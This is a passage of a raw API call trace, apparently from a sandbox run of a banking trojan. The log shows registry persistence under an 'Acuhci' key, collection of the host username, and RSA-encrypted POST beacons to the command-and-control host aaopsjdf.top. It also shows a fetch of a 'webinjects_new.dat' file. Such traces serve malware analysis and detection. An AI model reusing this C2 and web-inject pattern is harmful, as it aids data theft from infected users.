CreateEventW (lpEventAttributes=0x877e4, bManualReset=0, bInitialState=0, lpName="4DA38C1F12D18946B17EA3A654259059") returned 0x108 [0458.140] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0x0) returned 0x102 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="AB") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="C6") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="B5") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="B7") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="74") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="FF") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="9F") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="D7") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="F5") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="4E") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="C2") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="77") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="09") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="8C") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="64") returned 2 [0458.141] wvnsprintfW (in: pszDest=0x281e1d0, cchDest=3, pszFmt="%02X", arglist=0x281e1ac | out: pszDest="EE") returned 2 [0458.141] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x10c [0458.141] WaitForSingleObject (hHandle=0x10c, dwMilliseconds=0xffffffff) returned 0x0 [0458.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281e0d2, cbMultiByte=6, lpWideCharStr=0x89b20, cchWideChar=10 | out: lpWideCharStr="Acuhci") returned 6 [0458.141] PathCombineW (in: pszDest=0x89a68, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0458.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281e0f0, cbMultiByte=9, lpWideCharStr=0x89b20, cchWideChar=10 | out: lpWideCharStr="Baywkivyl") returned 9 [0458.141] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x281e0f0 | out: phkResult=0x281e0f0*=0x110) returned 0x0 [0458.141] RegQueryValueExW (in: hKey=0x110, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x281e11c, lpData=0x0, lpcbData=0x281e104*=0x0 | out: lpType=0x281e11c*=0x3, lpData=0x0, lpcbData=0x281e104*=0x6f0) returned 0x0 [0458.141] RegQueryValueExW (in: hKey=0x110, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x281e11c, lpData=0x3d0dd0, lpcbData=0x281e104*=0x6f0 | out: lpType=0x281e11c*=0x3, lpData=0x3d0dd0*, lpcbData=0x281e104*=0x6f0) returned 0x0 [0458.141] RegCloseKey (hKey=0x110) returned 0x0 [0458.142] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x281e3b4 | out: phkResult=0x281e3b4*=0x110) returned 0x0 [0458.142] RegQueryValueExW (in: hKey=0x110, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281e3e0, lpData=0x0, lpcbData=0x281e3c8*=0x0 | out: lpType=0x281e3e0*=0x3, lpData=0x0, lpcbData=0x281e3c8*=0x6f0) returned 0x0 [0458.142] RegQueryValueExW (in: hKey=0x110, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281e3e0, lpData=0x3d0dd0, lpcbData=0x281e3c8*=0x6f0 | out: lpType=0x281e3e0*=0x3, lpData=0x3d0dd0*, lpcbData=0x281e3c8*=0x6f0) returned 0x0 [0458.142] RegCloseKey (hKey=0x110) returned 0x0 [0458.144] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x281e104, lpdwDisposition=0x0 | out: phkResult=0x281e104*=0x110, lpdwDisposition=0x0) returned 0x0 [0458.144] RegSetValueExW (in: hKey=0x110, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x3d0dd0*, cbData=0x6f0 | out: lpData=0x3d0dd0*) returned 0x0 [0458.144] RegCloseKey (hKey=0x110) returned 0x0 [0458.144] ReleaseMutex (hMutex=0x10c) returned 1 [0458.144] CloseHandle (hObject=0x10c) returned 1 [0458.144] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x281e5c4 | out: phkResult=0x281e5c4*=0x10c) returned 0x0 [0458.144] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x281e5f0, lpData=0x0, lpcbData=0x281e5d8*=0x0 | out: lpType=0x281e5f0*=0x3, lpData=0x0, lpcbData=0x281e5d8*=0x6f0) returned 0x0 [0458.144] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x281e5f0, lpData=0x3d0dd0, lpcbData=0x281e5d8*=0x6f0 | out: lpType=0x281e5f0*=0x3, lpData=0x3d0dd0*, lpcbData=0x281e5d8*=0x6f0) returned 0x0 [0458.144] RegCloseKey (hKey=0x10c) returned 0x0 [0458.145] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x281ef58 | out: lpUrlComponents=0x281ef58) returned 1 [0458.252] GetSystemTime (in: lpSystemTime=0x281ec08 | out: lpSystemTime=0x281ec08*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x3b, wSecond=0x9, wMilliseconds=0x2d)) [0458.252] SystemTimeToFileTime (in: lpSystemTime=0x281ec08, lpFileTime=0x281ec18 | out: lpFileTime=0x281ec18) returned 1 [0458.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0458.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x40e4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0458.252] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x281ec90, nSize=0x281ec3c | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x281ec3c) returned 0x1 [0458.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0458.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x3d09c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YKYD69Q\\aETAdzjz", lpUsedDefaultChar=0x0) returned 16 [0458.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0458.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x44fe60, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DA064951B33C749DEEA4F9B0A440E075", lpUsedDefaultChar=0x0) returned 32 [0458.253] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x281eb8c | out: phkResult=0x281eb8c*=0x28c) returned 0x0 [0458.253] RegQueryValueExW (in: hKey=0x28c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281ebb8, lpData=0x0, lpcbData=0x281eba0*=0x0 | out: lpType=0x281ebb8*=0x3, lpData=0x0, lpcbData=0x281eba0*=0x6f0) returned 0x0 [0458.253] RegQueryValueExW (in: hKey=0x28c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281ebb8, lpData=0x40e6a0, lpcbData=0x281eba0*=0x6f0 | out: lpType=0x281ebb8*=0x3, lpData=0x40e6a0*, lpcbData=0x281eba0*=0x6f0) returned 0x0 [0458.253] RegCloseKey (hKey=0x28c) returned 0x0 [0458.253] wvnsprintfW (in: pszDest=0x281ec44, cchDest=10, pszFmt="%u.%u.%u", arglist=0x281ec1c | out: pszDest="2.6.1") returned 5 [0458.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0458.253] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x281edfe, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x281eb60, pcbStructInfo=0x281eb44 | out: pvStructInfo=0x281eb60, pcbStructInfo=0x281eb44) returned 1 [0458.253] CryptImportPublicKeyInfo (in: hCryptProv=0x55e630, dwCertEncodingType=0x1, pInfo=0x5773e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x577418*, PublicKey.cbData=0x10d, PublicKey.pbData=0x577420*, PublicKey.cUnusedBits=0x0), phKey=0x281eb50 | out: phKey=0x281eb50*=0x577538) returned 1 [0458.254] LocalFree (hMem=0x5773e8) returned 0x0 [0458.254] wvnsprintfA (in: pszDest=0x40daa8, cchDest=21, pszFmt="%d", arglist=0x281ea64 | out: pszDest="1515610749") returned 10 [0458.254] CryptEncrypt (in: hKey=0x577538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x281e9b0*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x281e9b0*=0x100) returned 1 [0458.254] CryptEncrypt (in: hKey=0x577538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1250*, pdwDataLen=0x281e9c4*=0x20, dwBufLen=0x100 | out: pbData=0x3d1250*, pdwDataLen=0x281e9c4*=0x100) returned 1 [0458.254] CryptDestroyKey (hKey=0x577538) returned 1 [0458.254] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x281eac0 | out: lpUrlComponents=0x281eac0) returned 1 [0458.254] wvnsprintfA (in: pszDest=0x3d1120, cchDest=516, pszFmt="%s%s", arglist=0x281eaf8 | out: pszDest="https://aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA") returned 55 [0458.254] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x281eab8 | out: lpUrlComponents=0x281eab8) returned 1 [0458.254] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0458.254] InternetSetOptionA (hInternet=0xcc001c, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0458.254] InternetSetOptionA (hInternet=0xcc001c, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0458.254] InternetSetOptionA (hInternet=0xcc001c, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0458.254] InternetConnectA (hInternet=0xcc001c, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0020 [0458.254] HttpOpenRequestA (hConnect=0xcc0020, lpszVerb="POST", lpszObjectName="/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc0024 [0458.254] HttpSendRequestA (hRequest=0xcc0024, lpszHeaders="Connection: close\r\na ü@", dwHeadersLength=0x13, lpOptional=0x40e6a0, dwOptionalLength=0x300) returned 0 [0458.743] InternetQueryOptionA (in: hInternet=0xcc0024, dwOption=0x1f, lpBuffer=0x281e9dc, lpdwBufferLength=0x281e9e0 | out: lpBuffer=0x281e9dc, lpdwBufferLength=0x281e9e0) returned 1 [0458.743] InternetSetOptionA (hInternet=0xcc0024, dwOption=0x1f, lpBuffer=0x281e9dc, dwBufferLength=0x4) returned 1 [0458.743] HttpSendRequestA (in: hRequest=0xcc0024, lpszHeaders="Connection: close\r\na ü@", dwHeadersLength=0x13, lpOptional=0x40e6a0*, dwOptionalLength=0x300 | out: lpOptional=0x40e6a0*) returned 1 [0459.229] HttpQueryInfoA (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x281e9dc, lpdwBufferLength=0x281e9e0, lpdwIndex=0x0 | out: lpBuffer=0x281e9dc*, lpdwBufferLength=0x281e9e0*=0x4, lpdwIndex=0x0) returned 1 [0459.229] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0459.229] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x4124a0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x281eaf0 | out: lpBuffer=0x4124a0*, lpdwNumberOfBytesRead=0x281eaf0*=0xc0) returned 1 [0459.230] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0459.230] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x412560, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x281eaf0 | out: lpBuffer=0x412560*, lpdwNumberOfBytesRead=0x281eaf0*=0x0) returned 1 [0459.230] InternetCloseHandle (hInternet=0xcc0024) returned 1 [0459.231] InternetQueryOptionA (in: hInternet=0xcc0020, dwOption=0x15, lpBuffer=0x281eaec, lpdwBufferLength=0x281eae8 | out: lpBuffer=0x281eaec, lpdwBufferLength=0x281eae8) returned 1 [0459.231] InternetCloseHandle (hInternet=0xcc0020) returned 1 [0459.231] InternetCloseHandle (hInternet=0xcc001c) returned 1 [0459.231] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x3bc [0459.231] WaitForSingleObject (hHandle=0x3bc, dwMilliseconds=0xffffffff) returned 0x0 [0459.231] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x281ece8 | out: phkResult=0x281ece8*=0x518) returned 0x0 [0459.231] RegQueryValueExW (in: hKey=0x518, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x281ed14, lpData=0x0, lpcbData=0x281ecfc*=0x0 | out: lpType=0x281ed14*=0x3, lpData=0x0, lpcbData=0x281ecfc*=0x6f0) returned 0x0 [0459.231] RegQueryValueExW (in: hKey=0x518, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x281ed14, lpData=0x40e6a0, lpcbData=0x281ecfc*=0x6f0 | out: lpType=0x281ed14*=0x3, lpData=0x40e6a0*, lpcbData=0x281ecfc*=0x6f0) returned 0x0 [0459.231] RegCloseKey (hKey=0x518) returned 0x0 [0459.232] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x281ecfc, lpdwDisposition=0x0 | out: phkResult=0x281ecfc*=0x518, lpdwDisposition=0x0) returned 0x0 [0459.232] RegSetValueExW (in: hKey=0x518, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x40e6a0*, cbData=0x6f0 | out: lpData=0x40e6a0*) returned 0x0 [0459.232] RegCloseKey (hKey=0x518) returned 0x0 [0459.232] ReleaseMutex (hMutex=0x3bc) returned 1 [0459.232] CloseHandle (hObject=0x3bc) returned 1 [0459.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x281f80c | out: phkResult=0x281f80c*=0x3bc) returned 0x0 [0459.232] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281f838, lpData=0x0, lpcbData=0x281f820*=0x0 | out: lpType=0x281f838*=0x3, lpData=0x0, lpcbData=0x281f820*=0x6f0) returned 0x0 [0459.232] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281f838, lpData=0x40e6a0, lpcbData=0x281f820*=0x6f0 | out: lpType=0x281f838*=0x3, lpData=0x40e6a0*, lpcbData=0x281f820*=0x6f0) returned 0x0 [0459.232] RegCloseKey (hKey=0x3bc) returned 0x0 [0459.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x281ee24 | out: phkResult=0x281ee24*=0x3bc) returned 0x0 [0459.232] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x281ee50, lpData=0x0, lpcbData=0x281ee38*=0x0 | out: lpType=0x281ee50*=0x3, lpData=0x0, lpcbData=0x281ee38*=0x6f0) returned 0x0 [0459.232] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x281ee50, lpData=0x4124b8, lpcbData=0x281ee38*=0x6f0 | out: lpType=0x281ee50*=0x3, lpData=0x4124b8*, lpcbData=0x281ee38*=0x6f0) returned 0x0 [0459.232] RegCloseKey (hKey=0x3bc) returned 0x0 [0459.232] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinjects_new.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x281f7b8 | out: lpUrlComponents=0x281f7b8) returned 1 [0459.232] GetSystemTime (in: lpSystemTime=0x281f468 | out: lpSystemTime=0x281f468*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x3b, wSecond=0xa, wMilliseconds=0x1c)) [0459.232] SystemTimeToFileTime (in: lpSystemTime=0x281f468, lpFileTime=0x281f478 | out: lpFileTime=0x281f478) returned 1 [0459.232] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x281f4f0, nSize=0x281f49c | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x281f49c) returned 0x1 [0459.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0459.233] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x281f3ec | out: phkResult=0x281f3ec*=0x3bc) returned 0x0 [0459.233] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281f418, lpData=0x0, lpcbData=0x281f400*=0x0 | out: lpType=0x281f418*=0x3, lpData=0x0, lpcbData=0x281f400*=0x6f0) returned 0x0 [0459.233] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x281f418, lpData=0x4124b8, lpcbData=0x281f400*=0x6f0 | out: lpType=0x281f418*=0x3, lpData=0x4124b8*, lpcbData=0x281f400*=0x6f0) returned 0x0 [0459.233] RegCloseKey (hKey=0x3bc) returned 0x0 [0459.233] wvnsprintfW (in: pszDest=0x281f4a4, cchDest=10, pszFmt="%u.%u.%u", arglist=0x281f47c | out: pszDest="2.6.1") returned 5 [0459.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0459.233] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x281f65e, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x281f3c0, pcbStructInfo=0x281f3a4 | out: pvStructInfo=0x281f3c0, pcbStructInfo=0x281f3a4) returned 1 [0459.233] CryptImportPublicKeyInfo (in: hCryptProv=0x55e630, dwCertEncodingType=0x1, pInfo=0x59a250*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x59a280*, PublicKey.cbData=0x10d, PublicKey.pbData=0x59a288*, PublicKey.cUnusedBits=0x0), phKey=0x281f3b0 | out: phKey=0x281f3b0*=0x57c9a0) returned 1 [0459.233] LocalFree (hMem=0x59a250) returned 0x0 [0459.233] wvnsprintfA (in: pszDest=0x3dc268, cchDest=21, pszFmt="%d", arglist=0x281f2c4 | out: pszDest="1515610750") returned 10 [0459.233] CryptEncrypt (in: hKey=0x57c9a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x281f210*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x281f210*=0x100) returned 1 [0459.233] CryptEncrypt (in: hKey=0x57c9a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4104b8*, pdwDataLen=0x281f224*=0x20, dwBufLen=0x100 | out: pbData=0x4104b8*, pdwDataLen=0x281f224*=0x100) returned 1 [0459.234] CryptDestroyKey (hKey=0x57c9a0) returned 1 [0459.234] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinjects_new.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x281f320 | out: lpUrlComponents=0x281f320) returned 1 [0459.234] wvnsprintfA (in: pszDest=0x3d1238, cchDest=516, pszFmt="%s%s", arglist=0x281f358 | out: pszDest="https://aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ") returned 62 [0459.234] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x281f318 | out: lpUrlComponents=0x281f318) returned 1 [0459.234] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0459.234] InternetSetOptionA (hInternet=0xcc0010, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0459.234] InternetSetOptionA (hInternet=0xcc0010, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0459.234] InternetSetOptionA (hInternet=0xcc0010, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0459.234] InternetConnectA (hInternet=0xcc0010, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0014 [0459.234] HttpOpenRequestA (hConnect=0xcc0014, lpszVerb="POST", lpszObjectName="/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc0018 [0459.234] HttpSendRequestA (hRequest=0xcc0018, lpszHeaders="Connection: close\r\nt ¤A", dwHeadersLength=0x13, lpOptional=0x40e6a0, dwOptionalLength=0x300) returned 0 [0459.449] InternetQueryOptionA (in: hInternet=0xcc0018, dwOption=0x1f, lpBuffer=0x281f23c, lpdwBufferLength=0x281f240 | out: lpBuffer=0x281f23c, lpdwBufferLength=0x281f240) returned 1 [0459.449] InternetSetOptionA (hInternet=0xcc0018, dwOption=0x1f, lpBuffer=0x281f23c, dwBufferLength=0x4) returned 1 [0459.449] HttpSendRequestA (in: hRequest=0xcc0018, lpszHeaders="Connection: close\r\nt ¤A", dwHeadersLength=0x13, lpOptional=0x40e6a0*, dwOptionalLength=0x300 | out: lpOptional=0x40e6a0*) returned 1 [0459.900] HttpQueryInfoA (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0x281f23c, lpdwBufferLength=0x281f240, lpdwIndex=0x0 | out: lpBuffer=0x281f23c*, lpdwBufferLength=0x281f240*=0x4, lpdwIndex=0x0) returned 1 [0459.900] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0459.900] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0x41b5d0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x281f350 | out: lpBuffer=0x41b5d0*, lpdwNumberOfBytesRead=0x281f350*=0xc0) returned 1 [0459.901] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0459.901] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0x41b690, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x281f350 | out: lpBuffer=0x41b690*, lpdwNumberOfBytesRead=0x281f350*=0x0) returned 1 [0459.902] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0459.903] InternetQueryOptionA (in: hInternet=0xcc0014, dwOption=0x15, lpBuffer=0x281f34c, lpdwBufferLength=0x281f348 | out: lpBuffer=0x281f34c, lpdwBufferLength=0x281f348) returned 1 [0459.903] InternetCloseHandle (hInternet=0xcc0014) returned 1 [0459.903] InternetCloseHandle (hInternet=0xcc0010) returned 1 Thread: id = 356 os_tid = 0x7d8 [0458.170] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52f514 | out: phkResult=0x52f514*=0x18c) returned 0x0 [0458.170] RegQueryValueExW (in: hKey=0x18c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f540, lpData=0x0, lpcbData=0x52f528*=0x0 | out: lpType=0x52f540*=0x3, lpData=0x0, lpcbData=0x52f528*=0x6f0) returned 0x0 [0458.170] RegQueryValueExW (in: hKey=0x18c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f540, lpData=0x3d0dd0, lpcbData=0x52f528*=0x6f0 | out: lpType=0x52f540*=0x3, lpData=0x3d0dd0*, lpcbData=0x52f528*=0x6f0) returned 0x0 [0458.170] RegCloseKey (hKey=0x18c) returned 0x0 [0458.172] WaitForSingleObject (hHandle=0x8, 